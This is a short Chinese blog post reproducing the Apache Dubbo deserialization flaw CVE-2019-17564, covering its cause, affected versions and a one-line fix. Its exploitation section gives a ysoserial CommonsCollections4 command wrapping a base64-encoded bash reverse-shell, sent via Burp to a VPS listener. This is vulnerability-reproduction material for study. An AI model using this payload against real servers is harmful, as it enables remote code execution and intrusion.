Aapche Dubbo Java反序列化漏洞(CVE-2019-17564)漏洞复现


1、产品简介


     Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架。

2、漏洞概述


      Dubbo可以使用不同协议通信,当使用http协议时,Apache Dubbo直接使用了Spring框架的org.springframework.remoting.httpinvoker.HttpInvokerServiceExporter类做远程调用,而这个过程会读取POST请求的Body并进行反序列化,最终导致漏洞。

3、影响范围


     Apache Dubbo 2.7.4及以前版本

4、利用流程

1、使用工具ysoserial生成payload
    工具地址:https://github.com/frohoff/ysoserial

 java -jar ysoserial-all.jar CommonsCollections4 "bash -c {echo,反弹shell指令}|{base64,-d}|{bash,-i}" > payload.out

2、将payload.out文件下载到桌面,使用bp加载到请求体发送请求(注意请求路径和方式)
     Aapche Dubbo Java反序列化漏洞(CVE-2019-17564)漏洞复现_第1张图片

3、VPS提前开启监听,成功反弹shell
     Aapche Dubbo Java反序列化漏洞(CVE-2019-17564)漏洞复现_第2张图片
 

5、修复方案
    升级到版本

你可能感兴趣的:(漏洞复现,dubbo,java,开发语言,网络安全,web安全)